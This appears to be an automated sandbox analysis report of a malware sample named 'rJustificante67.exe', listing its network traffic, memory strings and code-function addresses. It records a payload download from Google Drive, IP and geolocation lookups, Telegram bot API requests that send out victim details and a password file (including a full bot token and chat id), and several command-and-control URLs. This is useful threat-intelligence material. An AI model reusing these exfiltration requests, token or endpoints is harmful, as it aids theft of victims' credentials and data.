            Source: global trafficHTTP traffic detected: GET /download?id=1nDB7ry8SARfoQUp67ibCPOyNMq9q_OUV&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49864 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1nDB7ry8SARfoQUp67ibCPOyNMq9q_OUV HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1nDB7ry8SARfoQUp67ibCPOyNMq9q_OUV&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:936905%0D%0ADate%20and%20Time:%2017/02/2025%20/%2017:09:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20936905%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0/sendDocument?chat_id=7618581100&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd4f75dbc47cddHost: api.telegram.orgContent-Length: 582
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 17 Feb 2025 22:09:32 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: rJustificante67.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: rJustificante67.exe, 00000003.00000002.3928016802.0000000033E52000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340CF000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032EF1000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3926681535.0000000032F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:936905%0D%0ADate%20a
            Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0/sendDocument?chat_id=7618
            Source: rJustificante67.exe, 00000003.00000003.2459334272.00000000028D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: rJustificante67.exe, 00000003.00000002.3928016802.0000000033E52000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340CF000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: rJustificante67.exe, 00000003.00000002.3928016802.0000000033E52000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340CF000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: rJustificante67.exe, 00000003.00000002.3928016802.0000000033E52000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340CF000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032FD4000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3926681535.0000000033005000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3926681535.0000000032F1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032FD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
            Source: rJustificante67.exe, 00000003.00000002.3907242977.0000000002868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: rJustificante67.exe, 00000003.00000002.3907242977.0000000002868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/n#_
            Source: rJustificante67.exe, 00000003.00000002.3907744649.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3907242977.00000000028A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1nDB7ry8SARfoQUp67ibCPOyNMq9q_OUV
            Source: rJustificante67.exe, 00000003.00000002.3907242977.00000000028BD000.00000004.00000020.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000003.2493211714.00000000028D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/M
            Source: rJustificante67.exe, 00000003.00000002.3907242977.00000000028BD000.00000004.00000020.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000003.2493211714.00000000028D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/a
            Source: rJustificante67.exe, 00000003.00000003.2459334272.00000000028D6000.00000004.00000020.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3907242977.00000000028A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1nDB7ry8SARfoQUp67ibCPOyNMq9q_OUV&export=download
            Source: rJustificante67.exe, 00000003.00000002.3907242977.00000000028BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1nDB7ry8SARfoQUp67ibCPOyNMq9q_OUV&export=download/
            Source: rJustificante67.exe, 00000003.00000002.3928016802.0000000033E52000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340CF000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: rJustificante67.exe, 00000003.00000002.3928016802.0000000033E52000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340CF000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: rJustificante67.exe, 00000003.00000002.3928016802.0000000033E52000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340CF000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032E7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032E7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032EAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000032EF1000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3926681535.0000000032EAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: rJustificante67.exe, 00000003.00000003.2459334272.00000000028D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: rJustificante67.exe, 00000003.00000002.3928016802.0000000033E52000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340CF000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: rJustificante67.exe, 00000003.00000003.2459334272.00000000028D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: rJustificante67.exe, 00000003.00000003.2459334272.00000000028D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: rJustificante67.exe, 00000003.00000002.3928016802.0000000033E52000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340CF000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3928016802.00000000340B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: rJustificante67.exe, 00000003.00000003.2459334272.00000000028D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: rJustificante67.exe, 00000003.00000003.2459334272.00000000028D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000033005000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000003.00000002.3926681535.0000000032F1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000033005000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
            Source: rJustificante67.exe, 00000003.00000002.3926681535.0000000033000000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
            Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
            Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
            Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
            Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
            Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
            Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.5:49826 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.5:49837 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49922 version: TLS 1.2
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 0_2_00405295 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405295
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 0_2_0040331C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040331C
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_0040331C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,3_2_0040331C
            Source: C:\Users\user\Desktop\rJustificante67.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 0_2_00404AD20_2_00404AD2
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 0_2_004064F70_2_004064F7
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_3_3584E99F3_3_3584E99F
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_3_3584F5E53_3_3584F5E5
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_3_3584F8653_3_3584F865
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_00404AD23_2_00404AD2
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_004064F73_2_004064F7
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E096A3_2_016E096A
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E116B3_2_016E116B
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E21663_2_016E2166
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E157D3_2_016E157D
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E0D783_2_016E0D78
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E19763_2_016E1976
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E194C3_2_016E194C
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E09443_2_016E0944
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E1D5B3_2_016E1D5B
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E11583_2_016E1158
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E0D573_2_016E0D57
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E15203_2_016E1520
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E213F3_2_016E213F
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E153C3_2_016E153C
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E0D3A3_2_016E0D3A
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E1D333_2_016E1D33
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E11313_2_016E1131
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E0D073_2_016E0D07
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E211C3_2_016E211C
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E09153_2_016E0915
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E11123_2_016E1112
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E1D123_2_016E1D12
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E19EF3_2_016E19EF
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E1DEF3_2_016E1DEF
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E21FE3_2_016E21FE
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E0DFD3_2_016E0DFD
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E15F93_2_016E15F9
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E11F93_2_016E11F9
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E19CF3_2_016E19CF
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E15CC3_2_016E15CC
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E0DC83_2_016E0DC8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E1DC93_2_016E1DC9
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E11C53_2_016E11C5
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E21DF3_2_016E21DF
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E0DDC3_2_016E0DDC
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E09D73_2_016E09D7
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E09AE3_2_016E09AE
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E19AD3_2_016E19AD
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E0DA43_2_016E0DA4
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E15A23_2_016E15A2
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E1DB83_2_016E1DB8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E21B13_2_016E21B1
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E218F3_2_016E218F
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E11893_2_016E1189
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E1D843_2_016E1D84
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E09973_2_016E0997
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E19903_2_016E1990
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E006D3_2_016E006D
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E1C683_2_016E1C68
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E20683_2_016E2068
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E10663_2_016E1066
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E18723_2_016E1872
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E08733_2_016E0873
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E0C733_2_016E0C73
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E004E3_2_016E004E
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E144F3_2_016E144F
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E204A3_2_016E204A
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E20483_2_016E2048
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E1C463_2_016E1C46
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E10413_2_016E1041
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E005F3_2_016E005F
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E0C573_2_016E0C57
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E142F3_2_016E142F
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E08283_2_016E0828
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E10283_2_016E1028
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E1C223_2_016E1C22
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E20213_2_016E2021
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E083E3_2_016E083E
